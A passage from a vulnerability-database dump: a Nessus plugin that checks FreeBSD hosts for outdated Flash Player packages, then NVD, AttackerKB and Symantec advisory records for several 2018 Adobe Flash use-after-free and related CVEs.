retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106649);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n\n script_name(english:\"FreeBSD : Flash Player -- multiple vulnerabilities (756a8631-0b84-11e8-a986-6451062f0f7a) (Underminer)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\n- This update resolves use-after-free vulnerabilities that could lead\nto remote code execution (CVE-2018-4877, CVE-2018-4878).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\"\n );\n # https://vuxml.freebsd.org/freebsd/756a8631-0b84-11e8-a986-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20175c41\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<28.0.0.161\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:52:39", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable use after free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-19T17:29:00", "title": "CVE-2018-4919", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919"], "modified": "2018-06-27T13:38:00", "cpe": ["cpe:/a:adobe:flash_player_desktop_runtime:28.0.0.161", "cpe:/a:adobe:flash_player:28.0.0.161"], "id": "CVE-2018-4919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4919", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player_desktop_runtime:28.0.0.161:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:internet_explorer_11:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:chrome:*:*"]}, {"lastseen": "2021-02-02T06:52:39", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable type confusion vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-19T17:29:00", "title": "CVE-2018-4920", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4920"], "modified": "2018-06-27T13:39:00", "cpe": ["cpe:/a:adobe:flash_player_desktop_runtime:28.0.0.161", "cpe:/a:adobe:flash_player:28.0.0.161"], "id": "CVE-2018-4920", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4920", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player_desktop_runtime:28.0.0.161:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:internet_explorer_11:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.161:*:*:*:*:chrome:*:*"]}, {"lastseen": "2021-02-02T06:52:39", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player's quality of service functionality. A successful attack can lead to arbitrary code execution.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-06T21:29:00", "title": "CVE-2018-4877", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877"], "modified": "2018-03-01T14:28:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0"], "id": "CVE-2018-4877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4877", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:39", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-06T21:29:00", "title": "CVE-2018-4878", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0"], "id": "CVE-2018-4878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:39", "description": "An Out-of-bounds Read issue was discovered in Adobe Flash Player before 28.0.0.137. This vulnerability occurs because of computation that reads data that is past the end of the target buffer. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-09T21:29:00", "title": "CVE-2018-4871", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-30T16:10:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:adobe:flash_player:28.0.0.126", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0"], "id": "CVE-2018-4871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4871", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:edge:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:internet_explorer_11:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:28.0.0.126:*:*:*:*:chrome:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:35:51", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878"], "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:50pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Adobe Flash Player before 28.0.0.161 \n\n * Associated Malware: DOGCALL \n\n * Mitigation: Update Adobe Flash Player installation to the latest version \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-24T00:00:00", "published": "2018-02-06T00:00:00", "id": "AKB:41DF47B0-8F5D-477F-9F42-AB76A33252AD", "href": "https://attackerkb.com/topics/X0lKweMzdr/cve-2018-4878", "type": "attackerkb", "title": "CVE-2018-4878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2018-03-21T00:02:43", "bulletinFamily": "software", "cvelist": ["CVE-2018-4920"], "description": "### Description\n\nAdobe Flash Player is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.637 \n * Adobe Flash Player 11.2.202.643 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 